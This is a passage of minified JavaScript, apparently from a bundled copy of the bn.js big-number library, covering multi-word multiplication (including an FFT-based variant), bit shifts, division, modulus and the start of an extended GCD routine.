                        c = ((o = o + Math.imul(h, Y) | 0) + (i >>> 13) | 0) + (be >>> 26) | 0, be &= 67108863, n = Math.imul(w, H), i = (i = Math.imul(w, G)) + Math.imul(T, H) | 0, o = Math.imul(T, G), n = n + Math.imul(E, W) | 0, i = (i = i + Math.imul(E, q) | 0) + Math.imul(A, W) | 0, o = o + Math.imul(A, q) | 0, n = n + Math.imul(y, Q) | 0, i = (i = i + Math.imul(y, K) | 0) + Math.imul(v, Q) | 0, o = o + Math.imul(v, K) | 0, n = n + Math.imul(p, X) | 0, i = (i = i + Math.imul(p, Y) | 0) + Math.imul(m, X) | 0, o = o + Math.imul(m, Y) | 0;
                        var Ee = (c + (n = n + Math.imul(d, $) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, ee) | 0) + Math.imul(h, $) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, ee) | 0) + (i >>> 13) | 0) + (Ee >>> 26) | 0, Ee &= 67108863, n = Math.imul(I, H), i = (i = Math.imul(I, G)) + Math.imul(S, H) | 0, o = Math.imul(S, G), n = n + Math.imul(w, W) | 0, i = (i = i + Math.imul(w, q) | 0) + Math.imul(T, W) | 0, o = o + Math.imul(T, q) | 0, n = n + Math.imul(E, Q) | 0, i = (i = i + Math.imul(E, K) | 0) + Math.imul(A, Q) | 0, o = o + Math.imul(A, K) | 0, n = n + Math.imul(y, X) | 0, i = (i = i + Math.imul(y, Y) | 0) + Math.imul(v, X) | 0, o = o + Math.imul(v, Y) | 0, n = n + Math.imul(p, $) | 0, i = (i = i + Math.imul(p, ee) | 0) + Math.imul(m, $) | 0, o = o + Math.imul(m, ee) | 0;
                        var Ae = (c + (n = n + Math.imul(d, re) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, ne) | 0) + Math.imul(h, re) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, ne) | 0) + (i >>> 13) | 0) + (Ae >>> 26) | 0, Ae &= 67108863, n = Math.imul(O, H), i = (i = Math.imul(O, G)) + Math.imul(x, H) | 0, o = Math.imul(x, G), n = n + Math.imul(I, W) | 0, i = (i = i + Math.imul(I, q) | 0) + Math.imul(S, W) | 0, o = o + Math.imul(S, q) | 0, n = n + Math.imul(w, Q) | 0, i = (i = i + Math.imul(w, K) | 0) + Math.imul(T, Q) | 0, o = o + Math.imul(T, K) | 0, n = n + Math.imul(E, X) | 0, i = (i = i + Math.imul(E, Y) | 0) + Math.imul(A, X) | 0, o = o + Math.imul(A, Y) | 0, n = n + Math.imul(y, $) | 0, i = (i = i + Math.imul(y, ee) | 0) + Math.imul(v, $) | 0, o = o + Math.imul(v, ee) | 0, n = n + Math.imul(p, re) | 0, i = (i = i + Math.imul(p, ne) | 0) + Math.imul(m, re) | 0, o = o + Math.imul(m, ne) | 0;
                        var _e = (c + (n = n + Math.imul(d, oe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, se) | 0) + Math.imul(h, oe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, se) | 0) + (i >>> 13) | 0) + (_e >>> 26) | 0, _e &= 67108863, n = Math.imul(B, H), i = (i = Math.imul(B, G)) + Math.imul(N, H) | 0, o = Math.imul(N, G), n = n + Math.imul(O, W) | 0, i = (i = i + Math.imul(O, q) | 0) + Math.imul(x, W) | 0, o = o + Math.imul(x, q) | 0, n = n + Math.imul(I, Q) | 0, i = (i = i + Math.imul(I, K) | 0) + Math.imul(S, Q) | 0, o = o + Math.imul(S, K) | 0, n = n + Math.imul(w, X) | 0, i = (i = i + Math.imul(w, Y) | 0) + Math.imul(T, X) | 0, o = o + Math.imul(T, Y) | 0, n = n + Math.imul(E, $) | 0, i = (i = i + Math.imul(E, ee) | 0) + Math.imul(A, $) | 0, o = o + Math.imul(A, ee) | 0, n = n + Math.imul(y, re) | 0, i = (i = i + Math.imul(y, ne) | 0) + Math.imul(v, re) | 0, o = o + Math.imul(v, ne) | 0, n = n + Math.imul(p, oe) | 0, i = (i = i + Math.imul(p, se) | 0) + Math.imul(m, oe) | 0, o = o + Math.imul(m, se) | 0;
                        var we = (c + (n = n + Math.imul(d, ue) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, ce) | 0) + Math.imul(h, ue) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, ce) | 0) + (i >>> 13) | 0) + (we >>> 26) | 0, we &= 67108863, n = Math.imul(k, H), i = (i = Math.imul(k, G)) + Math.imul(L, H) | 0, o = Math.imul(L, G), n = n + Math.imul(B, W) | 0, i = (i = i + Math.imul(B, q) | 0) + Math.imul(N, W) | 0, o = o + Math.imul(N, q) | 0, n = n + Math.imul(O, Q) | 0, i = (i = i + Math.imul(O, K) | 0) + Math.imul(x, Q) | 0, o = o + Math.imul(x, K) | 0, n = n + Math.imul(I, X) | 0, i = (i = i + Math.imul(I, Y) | 0) + Math.imul(S, X) | 0, o = o + Math.imul(S, Y) | 0, n = n + Math.imul(w, $) | 0, i = (i = i + Math.imul(w, ee) | 0) + Math.imul(T, $) | 0, o = o + Math.imul(T, ee) | 0, n = n + Math.imul(E, re) | 0, i = (i = i + Math.imul(E, ne) | 0) + Math.imul(A, re) | 0, o = o + Math.imul(A, ne) | 0, n = n + Math.imul(y, oe) | 0, i = (i = i + Math.imul(y, se) | 0) + Math.imul(v, oe) | 0, o = o + Math.imul(v, se) | 0, n = n + Math.imul(p, ue) | 0, i = (i = i + Math.imul(p, ce) | 0) + Math.imul(m, ue) | 0, o = o + Math.imul(m, ce) | 0;
                        var Te = (c + (n = n + Math.imul(d, de) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, he) | 0) + Math.imul(h, de) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, he) | 0) + (i >>> 13) | 0) + (Te >>> 26) | 0, Te &= 67108863, n = Math.imul(D, H), i = (i = Math.imul(D, G)) + Math.imul(j, H) | 0, o = Math.imul(j, G), n = n + Math.imul(k, W) | 0, i = (i = i + Math.imul(k, q) | 0) + Math.imul(L, W) | 0, o = o + Math.imul(L, q) | 0, n = n + Math.imul(B, Q) | 0, i = (i = i + Math.imul(B, K) | 0) + Math.imul(N, Q) | 0, o = o + Math.imul(N, K) | 0, n = n + Math.imul(O, X) | 0, i = (i = i + Math.imul(O, Y) | 0) + Math.imul(x, X) | 0, o = o + Math.imul(x, Y) | 0, n = n + Math.imul(I, $) | 0, i = (i = i + Math.imul(I, ee) | 0) + Math.imul(S, $) | 0, o = o + Math.imul(S, ee) | 0, n = n + Math.imul(w, re) | 0, i = (i = i + Math.imul(w, ne) | 0) + Math.imul(T, re) | 0, o = o + Math.imul(T, ne) | 0, n = n + Math.imul(E, oe) | 0, i = (i = i + Math.imul(E, se) | 0) + Math.imul(A, oe) | 0, o = o + Math.imul(A, se) | 0, n = n + Math.imul(y, ue) | 0, i = (i = i + Math.imul(y, ce) | 0) + Math.imul(v, ue) | 0, o = o + Math.imul(v, ce) | 0, n = n + Math.imul(p, de) | 0, i = (i = i + Math.imul(p, he) | 0) + Math.imul(m, de) | 0, o = o + Math.imul(m, he) | 0;
                        var Re = (c + (n = n + Math.imul(d, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(d, me) | 0) + Math.imul(h, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(h, me) | 0) + (i >>> 13) | 0) + (Re >>> 26) | 0, Re &= 67108863, n = Math.imul(D, W), i = (i = Math.imul(D, q)) + Math.imul(j, W) | 0, o = Math.imul(j, q), n = n + Math.imul(k, Q) | 0, i = (i = i + Math.imul(k, K) | 0) + Math.imul(L, Q) | 0, o = o + Math.imul(L, K) | 0, n = n + Math.imul(B, X) | 0, i = (i = i + Math.imul(B, Y) | 0) + Math.imul(N, X) | 0, o = o + Math.imul(N, Y) | 0, n = n + Math.imul(O, $) | 0, i = (i = i + Math.imul(O, ee) | 0) + Math.imul(x, $) | 0, o = o + Math.imul(x, ee) | 0, n = n + Math.imul(I, re) | 0, i = (i = i + Math.imul(I, ne) | 0) + Math.imul(S, re) | 0, o = o + Math.imul(S, ne) | 0, n = n + Math.imul(w, oe) | 0, i = (i = i + Math.imul(w, se) | 0) + Math.imul(T, oe) | 0, o = o + Math.imul(T, se) | 0, n = n + Math.imul(E, ue) | 0, i = (i = i + Math.imul(E, ce) | 0) + Math.imul(A, ue) | 0, o = o + Math.imul(A, ce) | 0, n = n + Math.imul(y, de) | 0, i = (i = i + Math.imul(y, he) | 0) + Math.imul(v, de) | 0, o = o + Math.imul(v, he) | 0;
                        var Ie = (c + (n = n + Math.imul(p, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(p, me) | 0) + Math.imul(m, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(m, me) | 0) + (i >>> 13) | 0) + (Ie >>> 26) | 0, Ie &= 67108863, n = Math.imul(D, Q), i = (i = Math.imul(D, K)) + Math.imul(j, Q) | 0, o = Math.imul(j, K), n = n + Math.imul(k, X) | 0, i = (i = i + Math.imul(k, Y) | 0) + Math.imul(L, X) | 0, o = o + Math.imul(L, Y) | 0, n = n + Math.imul(B, $) | 0, i = (i = i + Math.imul(B, ee) | 0) + Math.imul(N, $) | 0, o = o + Math.imul(N, ee) | 0, n = n + Math.imul(O, re) | 0, i = (i = i + Math.imul(O, ne) | 0) + Math.imul(x, re) | 0, o = o + Math.imul(x, ne) | 0, n = n + Math.imul(I, oe) | 0, i = (i = i + Math.imul(I, se) | 0) + Math.imul(S, oe) | 0, o = o + Math.imul(S, se) | 0, n = n + Math.imul(w, ue) | 0, i = (i = i + Math.imul(w, ce) | 0) + Math.imul(T, ue) | 0, o = o + Math.imul(T, ce) | 0, n = n + Math.imul(E, de) | 0, i = (i = i + Math.imul(E, he) | 0) + Math.imul(A, de) | 0, o = o + Math.imul(A, he) | 0;
                        var Se = (c + (n = n + Math.imul(y, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(y, me) | 0) + Math.imul(v, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(v, me) | 0) + (i >>> 13) | 0) + (Se >>> 26) | 0, Se &= 67108863, n = Math.imul(D, X), i = (i = Math.imul(D, Y)) + Math.imul(j, X) | 0, o = Math.imul(j, Y), n = n + Math.imul(k, $) | 0, i = (i = i + Math.imul(k, ee) | 0) + Math.imul(L, $) | 0, o = o + Math.imul(L, ee) | 0, n = n + Math.imul(B, re) | 0, i = (i = i + Math.imul(B, ne) | 0) + Math.imul(N, re) | 0, o = o + Math.imul(N, ne) | 0, n = n + Math.imul(O, oe) | 0, i = (i = i + Math.imul(O, se) | 0) + Math.imul(x, oe) | 0, o = o + Math.imul(x, se) | 0, n = n + Math.imul(I, ue) | 0, i = (i = i + Math.imul(I, ce) | 0) + Math.imul(S, ue) | 0, o = o + Math.imul(S, ce) | 0, n = n + Math.imul(w, de) | 0, i = (i = i + Math.imul(w, he) | 0) + Math.imul(T, de) | 0, o = o + Math.imul(T, he) | 0;
                        var Pe = (c + (n = n + Math.imul(E, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(E, me) | 0) + Math.imul(A, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(A, me) | 0) + (i >>> 13) | 0) + (Pe >>> 26) | 0, Pe &= 67108863, n = Math.imul(D, $), i = (i = Math.imul(D, ee)) + Math.imul(j, $) | 0, o = Math.imul(j, ee), n = n + Math.imul(k, re) | 0, i = (i = i + Math.imul(k, ne) | 0) + Math.imul(L, re) | 0, o = o + Math.imul(L, ne) | 0, n = n + Math.imul(B, oe) | 0, i = (i = i + Math.imul(B, se) | 0) + Math.imul(N, oe) | 0, o = o + Math.imul(N, se) | 0, n = n + Math.imul(O, ue) | 0, i = (i = i + Math.imul(O, ce) | 0) + Math.imul(x, ue) | 0, o = o + Math.imul(x, ce) | 0, n = n + Math.imul(I, de) | 0, i = (i = i + Math.imul(I, he) | 0) + Math.imul(S, de) | 0, o = o + Math.imul(S, he) | 0;
                        var Oe = (c + (n = n + Math.imul(w, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(w, me) | 0) + Math.imul(T, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(T, me) | 0) + (i >>> 13) | 0) + (Oe >>> 26) | 0, Oe &= 67108863, n = Math.imul(D, re), i = (i = Math.imul(D, ne)) + Math.imul(j, re) | 0, o = Math.imul(j, ne), n = n + Math.imul(k, oe) | 0, i = (i = i + Math.imul(k, se) | 0) + Math.imul(L, oe) | 0, o = o + Math.imul(L, se) | 0, n = n + Math.imul(B, ue) | 0, i = (i = i + Math.imul(B, ce) | 0) + Math.imul(N, ue) | 0, o = o + Math.imul(N, ce) | 0, n = n + Math.imul(O, de) | 0, i = (i = i + Math.imul(O, he) | 0) + Math.imul(x, de) | 0, o = o + Math.imul(x, he) | 0;
                        var xe = (c + (n = n + Math.imul(I, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(I, me) | 0) + Math.imul(S, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(S, me) | 0) + (i >>> 13) | 0) + (xe >>> 26) | 0, xe &= 67108863, n = Math.imul(D, oe), i = (i = Math.imul(D, se)) + Math.imul(j, oe) | 0, o = Math.imul(j, se), n = n + Math.imul(k, ue) | 0, i = (i = i + Math.imul(k, ce) | 0) + Math.imul(L, ue) | 0, o = o + Math.imul(L, ce) | 0, n = n + Math.imul(B, de) | 0, i = (i = i + Math.imul(B, he) | 0) + Math.imul(N, de) | 0, o = o + Math.imul(N, he) | 0;
                        var Me = (c + (n = n + Math.imul(O, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(O, me) | 0) + Math.imul(x, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(x, me) | 0) + (i >>> 13) | 0) + (Me >>> 26) | 0, Me &= 67108863, n = Math.imul(D, ue), i = (i = Math.imul(D, ce)) + Math.imul(j, ue) | 0, o = Math.imul(j, ce), n = n + Math.imul(k, de) | 0, i = (i = i + Math.imul(k, he) | 0) + Math.imul(L, de) | 0, o = o + Math.imul(L, he) | 0;
                        var Be = (c + (n = n + Math.imul(B, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(B, me) | 0) + Math.imul(N, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(N, me) | 0) + (i >>> 13) | 0) + (Be >>> 26) | 0, Be &= 67108863, n = Math.imul(D, de), i = (i = Math.imul(D, he)) + Math.imul(j, de) | 0, o = Math.imul(j, he);
                        var Ne = (c + (n = n + Math.imul(k, pe) | 0) | 0) + ((8191 & (i = (i = i + Math.imul(k, me) | 0) + Math.imul(L, pe) | 0)) << 13) | 0;
                        c = ((o = o + Math.imul(L, me) | 0) + (i >>> 13) | 0) + (Ne >>> 26) | 0, Ne &= 67108863;
                        var Ce = (c + (n = Math.imul(D, pe)) | 0) + ((8191 & (i = (i = Math.imul(D, me)) + Math.imul(j, pe) | 0)) << 13) | 0;
                        return c = ((o = Math.imul(j, me)) + (i >>> 13) | 0) + (Ce >>> 26) | 0, Ce &= 67108863, u[0] = ge, u[1] = ye, u[2] = ve, u[3] = be, u[4] = Ee, u[5] = Ae, u[6] = _e, u[7] = we, u[8] = Te, u[9] = Re, u[10] = Ie, u[11] = Se, u[12] = Pe, u[13] = Oe, u[14] = xe, u[15] = Me, u[16] = Be, u[17] = Ne, u[18] = Ce, 0 !== c && (u[19] = c, r.length++), r;
                    };
                    function y(e, t, r) {
                        r.negative = t.negative ^ e.negative, r.length = e.length + t.length;
                        for(var n = 0, i = 0, o = 0; o < r.length - 1; o++){
                            var s = i;
                            i = 0;
                            for(var a = 67108863 & n, u = Math.min(o, t.length - 1), c = Math.max(0, o - e.length + 1); c <= u; c++){
                                var l = o - c, d = (0 | e.words[l]) * (0 | t.words[c]), h = 67108863 & d;
                                a = 67108863 & (h = h + a | 0), i += (s = (s = s + (d / 67108864 | 0) | 0) + (h >>> 26) | 0) >>> 26, s &= 67108863;
                            }
                            r.words[o] = a, n = s, s = i;
                        }
                        return 0 !== n ? r.words[o] = n : r.length--, r._strip();
                    }
                    function v(e, t, r) {
                        return y(e, t, r);
                    }
                    function b(e, t) {
                        this.x = e, this.y = t;
                    }
                    Math.imul || (g = m), o.prototype.mulTo = function(e, t) {
                        var r = this.length + e.length;
                        return 10 === this.length && 10 === e.length ? g(this, e, t) : r < 63 ? m(this, e, t) : r < 1024 ? y(this, e, t) : v(this, e, t);
                    }, b.prototype.makeRBT = function(e) {
                        for(var t = new Array(e), r = o.prototype._countBits(e) - 1, n = 0; n < e; n++)t[n] = this.revBin(n, r, e);
                        return t;
                    }, b.prototype.revBin = function(e, t, r) {
                        if (0 === e || e === r - 1) return e;
                        for(var n = 0, i = 0; i < t; i++)n |= (1 & e) << t - i - 1, e >>= 1;
                        return n;
                    }, b.prototype.permute = function(e, t, r, n, i, o) {
                        for(var s = 0; s < o; s++)n[s] = t[e[s]], i[s] = r[e[s]];
                    }, b.prototype.transform = function(e, t, r, n, i, o) {
                        this.permute(o, e, t, r, n, i);
                        for(var s = 1; s < i; s <<= 1)for(var a = s << 1, u = Math.cos(2 * Math.PI / a), c = Math.sin(2 * Math.PI / a), l = 0; l < i; l += a)for(var d = u, h = c, f = 0; f < s; f++){
                            var p = r[l + f], m = n[l + f], g = r[l + f + s], y = n[l + f + s], v = d * g - h * y;
                            y = d * y + h * g, g = v, r[l + f] = p + g, n[l + f] = m + y, r[l + f + s] = p - g, n[l + f + s] = m - y, f !== a && (v = u * d - c * h, h = u * h + c * d, d = v);
                        }
                    }, b.prototype.guessLen13b = function(e, t) {
                        var r = 1 | Math.max(t, e), n = 1 & r, i = 0;
                        for(r = r / 2 | 0; r; r >>>= 1)i++;
                        return 1 << i + 1 + n;
                    }, b.prototype.conjugate = function(e, t, r) {
                        if (!(r <= 1)) for(var n = 0; n < r / 2; n++){
                            var i = e[n];
                            e[n] = e[r - n - 1], e[r - n - 1] = i, i = t[n], t[n] = -t[r - n - 1], t[r - n - 1] = -i;
                        }
                    }, b.prototype.normalize13b = function(e, t) {
                        for(var r = 0, n = 0; n < t / 2; n++){
                            var i = 8192 * Math.round(e[2 * n + 1] / t) + Math.round(e[2 * n] / t) + r;
                            e[n] = 67108863 & i, r = i < 67108864 ? 0 : i / 67108864 | 0;
                        }
                        return e;
                    }, b.prototype.convert13b = function(e, t, r, i) {
                        for(var o = 0, s = 0; s < t; s++)o += 0 | e[s], r[2 * s] = 8191 & o, o >>>= 13, r[2 * s + 1] = 8191 & o, o >>>= 13;
                        for(s = 2 * t; s < i; ++s)r[s] = 0;
                        n(0 === o), n(0 == (-8192 & o));
                    }, b.prototype.stub = function(e) {
                        for(var t = new Array(e), r = 0; r < e; r++)t[r] = 0;
                        return t;
                    }, b.prototype.mulp = function(e, t, r) {
                        var n = 2 * this.guessLen13b(e.length, t.length), i = this.makeRBT(n), o = this.stub(n), s = new Array(n), a = new Array(n), u = new Array(n), c = new Array(n), l = new Array(n), d = new Array(n), h = r.words;
                        h.length = n, this.convert13b(e.words, e.length, s, n), this.convert13b(t.words, t.length, c, n), this.transform(s, o, a, u, n, i), this.transform(c, o, l, d, n, i);
                        for(var f = 0; f < n; f++){
                            var p = a[f] * l[f] - u[f] * d[f];
                            u[f] = a[f] * d[f] + u[f] * l[f], a[f] = p;
                        }
                        return this.conjugate(a, u, n), this.transform(a, u, h, o, n, i), this.conjugate(h, o, n), this.normalize13b(h, n), r.negative = e.negative ^ t.negative, r.length = e.length + t.length, r._strip();
                    }, o.prototype.mul = function(e) {
                        var t = new o(null);
                        return t.words = new Array(this.length + e.length), this.mulTo(e, t);
                    }, o.prototype.mulf = function(e) {
                        var t = new o(null);
                        return t.words = new Array(this.length + e.length), v(this, e, t);
                    }, o.prototype.imul = function(e) {
                        return this.clone().mulTo(e, this);
                    }, o.prototype.imuln = function(e) {
                        var t = e < 0;
                        t && (e = -e), n("number" == typeof e), n(e < 67108864);
                        for(var r = 0, i = 0; i < this.length; i++){
                            var o = (0 | this.words[i]) * e, s = (67108863 & o) + (67108863 & r);
                            r >>= 26, r += o / 67108864 | 0, r += s >>> 26, this.words[i] = 67108863 & s;
                        }
                        return 0 !== r && (this.words[i] = r, this.length++), t ? this.ineg() : this;
                    }, o.prototype.muln = function(e) {
                        return this.clone().imuln(e);
                    }, o.prototype.sqr = function() {
                        return this.mul(this);
                    }, o.prototype.isqr = function() {
                        return this.imul(this.clone());
                    }, o.prototype.pow = function(e) {
                        var t = function(e) {
                            for(var t = new Array(e.bitLength()), r = 0; r < t.length; r++){
                                var n = r / 26 | 0, i = r % 26;
                                t[r] = e.words[n] >>> i & 1;
                            }
                            return t;
                        }(e);
                        if (0 === t.length) return new o(1);
                        for(var r = this, n = 0; n < t.length && 0 === t[n]; n++, r = r.sqr());
                        if (++n < t.length) for(var i = r.sqr(); n < t.length; n++, i = i.sqr())0 !== t[n] && (r = r.mul(i));
                        return r;
                    }, o.prototype.iushln = function(e) {
                        n("number" == typeof e && e >= 0);
                        var t, r = e % 26, i = (e - r) / 26, o = 67108863 >>> 26 - r << 26 - r;
                        if (0 !== r) {
                            var s = 0;
                            for(t = 0; t < this.length; t++){
                                var a = this.words[t] & o, u = (0 | this.words[t]) - a << r;
                                this.words[t] = u | s, s = a >>> 26 - r;
                            }
                            s && (this.words[t] = s, this.length++);
                        }
                        if (0 !== i) {
                            for(t = this.length - 1; t >= 0; t--)this.words[t + i] = this.words[t];
                            for(t = 0; t < i; t++)this.words[t] = 0;
                            this.length += i;
                        }
                        return this._strip();
                    }, o.prototype.ishln = function(e) {
                        return n(0 === this.negative), this.iushln(e);
                    }, o.prototype.iushrn = function(e, t, r) {
                        var i;
                        n("number" == typeof e && e >= 0), i = t ? (t - t % 26) / 26 : 0;
                        var o = e % 26, s = Math.min((e - o) / 26, this.length), a = 67108863 ^ 67108863 >>> o << o, u = r;
                        if (i -= s, i = Math.max(0, i), u) {
                            for(var c = 0; c < s; c++)u.words[c] = this.words[c];
                            u.length = s;
                        }
                        if (0 === s) ;
                        else if (this.length > s) for(this.length -= s, c = 0; c < this.length; c++)this.words[c] = this.words[c + s];
                        else this.words[0] = 0, this.length = 1;
                        var l = 0;
                        for(c = this.length - 1; c >= 0 && (0 !== l || c >= i); c--){
                            var d = 0 | this.words[c];
                            this.words[c] = l << 26 - o | d >>> o, l = d & a;
                        }
                        return u && 0 !== l && (u.words[u.length++] = l), 0 === this.length && (this.words[0] = 0, this.length = 1), this._strip();
                    }, o.prototype.ishrn = function(e, t, r) {
                        return n(0 === this.negative), this.iushrn(e, t, r);
                    }, o.prototype.shln = function(e) {
                        return this.clone().ishln(e);
                    }, o.prototype.ushln = function(e) {
                        return this.clone().iushln(e);
                    }, o.prototype.shrn = function(e) {
                        return this.clone().ishrn(e);
                    }, o.prototype.ushrn = function(e) {
                        return this.clone().iushrn(e);
                    }, o.prototype.testn = function(e) {
                        n("number" == typeof e && e >= 0);
                        var t = e % 26, r = (e - t) / 26, i = 1 << t;
                        return !(this.length <= r || !(this.words[r] & i));
                    }, o.prototype.imaskn = function(e) {
                        n("number" == typeof e && e >= 0);
                        var t = e % 26, r = (e - t) / 26;
                        if (n(0 === this.negative, "imaskn works only with positive numbers"), this.length <= r) return this;
                        if (0 !== t && r++, this.length = Math.min(r, this.length), 0 !== t) {
                            var i = 67108863 ^ 67108863 >>> t << t;
                            this.words[this.length - 1] &= i;
                        }
                        return this._strip();
                    }, o.prototype.maskn = function(e) {
                        return this.clone().imaskn(e);
                    }, o.prototype.iaddn = function(e) {
                        return n("number" == typeof e), n(e < 67108864), e < 0 ? this.isubn(-e) : 0 !== this.negative ? 1 === this.length && (0 | this.words[0]) <= e ? (this.words[0] = e - (0 | this.words[0]), this.negative = 0, this) : (this.negative = 0, this.isubn(e), this.negative = 1, this) : this._iaddn(e);
                    }, o.prototype._iaddn = function(e) {
                        this.words[0] += e;
                        for(var t = 0; t < this.length && this.words[t] >= 67108864; t++)this.words[t] -= 67108864, t === this.length - 1 ? this.words[t + 1] = 1 : this.words[t + 1]++;
                        return this.length = Math.max(this.length, t + 1), this;
                    }, o.prototype.isubn = function(e) {
                        if (n("number" == typeof e), n(e < 67108864), e < 0) return this.iaddn(-e);
                        if (0 !== this.negative) return this.negative = 0, this.iaddn(e), this.negative = 1, this;
                        if (this.words[0] -= e, 1 === this.length && this.words[0] < 0) this.words[0] = -this.words[0], this.negative = 1;
                        else for(var t = 0; t < this.length && this.words[t] < 0; t++)this.words[t] += 67108864, this.words[t + 1] -= 1;
                        return this._strip();
                    }, o.prototype.addn = function(e) {
                        return this.clone().iaddn(e);
                    }, o.prototype.subn = function(e) {
                        return this.clone().isubn(e);
                    }, o.prototype.iabs = function() {
                        return this.negative = 0, this;
                    }, o.prototype.abs = function() {
                        return this.clone().iabs();
                    }, o.prototype._ishlnsubmul = function(e, t, r) {
                        var i, o, s = e.length + r;
                        this._expand(s);
                        var a = 0;
                        for(i = 0; i < e.length; i++){
                            o = (0 | this.words[i + r]) + a;
                            var u = (0 | e.words[i]) * t;
                            a = ((o -= 67108863 & u) >> 26) - (u / 67108864 | 0), this.words[i + r] = 67108863 & o;
                        }
                        for(; i < this.length - r; i++)a = (o = (0 | this.words[i + r]) + a) >> 26, this.words[i + r] = 67108863 & o;
                        if (0 === a) return this._strip();
                        for(n(-1 === a), a = 0, i = 0; i < this.length; i++)a = (o = -(0 | this.words[i]) + a) >> 26, this.words[i] = 67108863 & o;
                        return this.negative = 1, this._strip();
                    }, o.prototype._wordDiv = function(e, t) {
                        var r = (this.length, e.length), n = this.clone(), i = e, s = 0 | i.words[i.length - 1];
                        0 != (r = 26 - this._countBits(s)) && (i = i.ushln(r), n.iushln(r), s = 0 | i.words[i.length - 1]);
                        var a, u = n.length - i.length;
                        if ("mod" !== t) {
                            (a = new o(null)).length = u + 1, a.words = new Array(a.length);
                            for(var c = 0; c < a.length; c++)a.words[c] = 0;
                        }
                        var l = n.clone()._ishlnsubmul(i, 1, u);
                        0 === l.negative && (n = l, a && (a.words[u] = 1));
                        for(var d = u - 1; d >= 0; d--){
                            var h = 67108864 * (0 | n.words[i.length + d]) + (0 | n.words[i.length + d - 1]);
                            for(h = Math.min(h / s | 0, 67108863), n._ishlnsubmul(i, h, d); 0 !== n.negative;)h--, n.negative = 0, n._ishlnsubmul(i, 1, d), n.isZero() || (n.negative ^= 1);
                            a && (a.words[d] = h);
                        }
                        return a && a._strip(), n._strip(), "div" !== t && 0 !== r && n.iushrn(r), {
                            div: a || null,
                            mod: n
                        };
                    }, o.prototype.divmod = function(e, t, r) {
                        var i, s, a;
                        return n(!e.isZero()), this.isZero() ? {
                            div: new o(0),
                            mod: new o(0)
                        } : 0 !== this.negative && 0 === e.negative ? (a = this.neg().divmod(e, t), "mod" !== t && (i = a.div.neg()), "div" !== t && (s = a.mod.neg(), r && 0 !== s.negative && s.iadd(e)), {
                            div: i,
                            mod: s
                        }) : 0 === this.negative && 0 !== e.negative ? (a = this.divmod(e.neg(), t), "mod" !== t && (i = a.div.neg()), {
                            div: i,
                            mod: a.mod
                        }) : 0 != (this.negative & e.negative) ? (a = this.neg().divmod(e.neg(), t), "div" !== t && (s = a.mod.neg(), r && 0 !== s.negative && s.isub(e)), {
                            div: a.div,
                            mod: s
                        }) : e.length > this.length || this.cmp(e) < 0 ? {
                            div: new o(0),
                            mod: this
                        } : 1 === e.length ? "div" === t ? {
                            div: this.divn(e.words[0]),
                            mod: null
                        } : "mod" === t ? {
                            div: null,
                            mod: new o(this.modrn(e.words[0]))
                        } : {
                            div: this.divn(e.words[0]),
                            mod: new o(this.modrn(e.words[0]))
                        } : this._wordDiv(e, t);
                    }, o.prototype.div = function(e) {
                        return this.divmod(e, "div", !1).div;
                    }, o.prototype.mod = function(e) {
                        return this.divmod(e, "mod", !1).mod;
                    }, o.prototype.umod = function(e) {
                        return this.divmod(e, "mod", !0).mod;
                    }, o.prototype.divRound = function(e) {
                        var t = this.divmod(e);
                        if (t.mod.isZero()) return t.div;
                        var r = 0 !== t.div.negative ? t.mod.isub(e) : t.mod, n = e.ushrn(1), i = e.andln(1), o = r.cmp(n);
                        return o < 0 || 1 === i && 0 === o ? t.div : 0 !== t.div.negative ? t.div.isubn(1) : t.div.iaddn(1);
                    }, o.prototype.modrn = function(e) {
                        var t = e < 0;
                        t && (e = -e), n(e <= 67108863);
                        for(var r = 67108864 % e, i = 0, o = this.length - 1; o >= 0; o--)i = (r * i + (0 | this.words[o])) % e;
                        return t ? -i : i;
                    }, o.prototype.modn = function(e) {
                        return this.modrn(e);
                    }, o.prototype.idivn = function(e) {
                        var t = e < 0;
                        t && (e = -e), n(e <= 67108863);
                        for(var r = 0, i = this.length - 1; i >= 0; i--){
                            var o = (0 | this.words[i]) + 67108864 * r;
                            this.words[i] = o / e | 0, r = o % e;
                        }
                        return this._strip(), t ? this.ineg() : this;
                    }, o.prototype.divn = function(e) {
                        return this.clone().idivn(e);
                    }, o.prototype.egcd = function(e) {
                        n(0 === e.negative), n(!e.isZero());
                        var t = this, r = e.clone();
                        t = 0 !== t.negative ? t.umod(e) : t.clone();
                        for(var i = new o(1), s = new o(0), a = new o(0), u = new o(1), c = 0; t.isEven() && r.isEven();)t.iushrn(1), r.iushrn(1), ++c;
                        for(var l = r.clone(), d = t.clone(); !t.isZero();){
                            for(var h = 0, f = 1; 0 == (t.words[0] & f) && h < 26; ++h, f <<= 1);
                            if (h > 0) for(t.iushrn(h); h-- > 0;)(i.isOdd() || s.isOdd()) && (i.iadd(l), s.isub(d)), i.iushrn(1), s.iushrn(1);
                            for(var p = 0, m = 1; 0 == (r.words[0] & m) && p < 26; ++p, m <<= 1);
